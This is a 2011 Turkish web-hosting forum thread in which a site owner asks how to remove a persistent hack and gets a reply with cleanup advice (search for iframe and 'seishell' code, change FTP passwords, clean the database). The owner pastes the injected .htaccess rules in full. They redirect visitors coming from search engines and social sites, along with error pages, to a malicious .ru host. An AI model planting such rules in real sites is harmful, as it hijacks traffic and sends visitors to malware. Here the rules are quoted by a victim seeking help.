| |
|
| |||||||
| Güvenlik Virus worm spyware security protection, en son çıkan açıklar ve yamaları, güvenlik dünyasından en son haberler. |
| |
 |
| | | LinkBack | Seçenekler |
13-06-2011, 19:31:00
| |||
| |||
Merhaba arkadaşlar, afedersiniz ib... nin biri siteme dadanmış ve htacces dosyasına bazı kodlar yerleştirmiş. Googleden arama yapılıp siteye tıklanınca direk olarak virüs bulaştıran bir siteye yönlendiriliyor. İşin daha ilginci ise yeni bir htacces oluşturup attığım anda bu kodlar kendini hemen yeni dosyaya da kopyalıyor. Daha önce başınagelen var mı? Çözümü nedir bu durumun. Yerleştirilen kodlar bunlar: RewriteEngine On ErrorDocument 400 http://seishell-inoa.ru/wings/index.php ErrorDocument 401 http://seishell-inoa.ru/wings/index.php ErrorDocument 403 http://seishell-inoa.ru/wings/index.php ErrorDocument 404 http://seishell-inoa.ru/wings/index.php ErrorDocument 500 http://seishell-inoa.ru/wings/index.php RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://seishell-inoa.ru/wings/index.php [R=301,L] Konu fermansah tarafından (13-06-2011 Saat 19:35:03 ) değiştirilmiştir..  |
|
30-06-2011, 01:01:22
| |||
| |||
http://www.r10.net/wordpress/362796-...temizleme.html buradan bulabilirsin sanırım senin virüsde aynı sistem ancak hem iframe olarak arattır hem de seishell diye arattır ki tam çözüm olsun ayrıca ftp şifrelerini değiştir mümkünse sqluda sil hiç bir şey kalmasın yok silemem diyorsanız aynı işlemi sqldada yapın ayrıca o htacces kodunu HTML-Kodu: [CODE][/CODE] Konu MicnuXx tarafından (30-06-2011 Saat 01:04:14 ) değiştirilmiştir.. |
|
| Bookmarks |
| Seçenekler | |
| |
adresi ile iletişime
geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 1
(Bir) Hafta içerisinde R10.net yönetimi olarak tarafımızdan gereken işlemler
yapılacak ve Avukatlarımız size dönüş yapacaktır.
htaccess dosyası sürekli değiştiriliyor ve siteyi yönlendiriyor 
